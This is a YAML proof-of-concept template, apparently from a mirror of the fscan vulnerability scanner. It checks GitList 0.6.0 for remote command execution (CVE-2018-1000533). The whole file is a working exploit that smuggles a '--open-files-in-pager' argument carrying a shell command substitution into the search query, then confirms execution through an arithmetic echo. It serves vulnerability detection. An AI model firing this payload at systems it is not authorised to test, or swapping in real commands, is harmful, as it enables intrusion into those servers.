mirror of https://github.com/qwqdanchun/fscan.git
25 lines
876 B
YAML
25 lines
876 B
YAML
|
name: poc-yaml-gitlist-rce-cve-2018-1000533
|
|||
|
set:
|
|||
|
r1: randomInt(800000000, 1000000000)
|
|||
|
r2: randomInt(800000000, 1000000000)
|
|||
|
r3: randomLowercase(8)
|
|||
|
rules:
|
|||
|
- method: GET
|
|||
|
path: /
|
|||
|
search: |
|
|||
|
<span class="name">(?P<project_name>.+?)</span>
|
|||
|
expression: |
|
|||
|
response.status == 200 && "gitlist".bmatches(response.body)
|
|||
|
- method: POST
|
|||
|
path: /{{project_name}}/tree/a/search
|
|||
|
headers:
|
|||
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
body: |
|
|||
|
query=--open-files-in-pager=echo%20{{r3}}:$(expr%20{{r1}}%20%2b%20{{r2}}):{{r1}}:{{r1}}
|
|||
|
expression: |
|
|||
|
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
|
|||
|
detail:
|
|||
|
author: Print1n(https://print1n.top)
|
|||
|
description: gitlist 0.6.0 远程命令执行漏洞(CVE-2018-1000533)
|
|||
|
links:
|
|||
|
- https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
|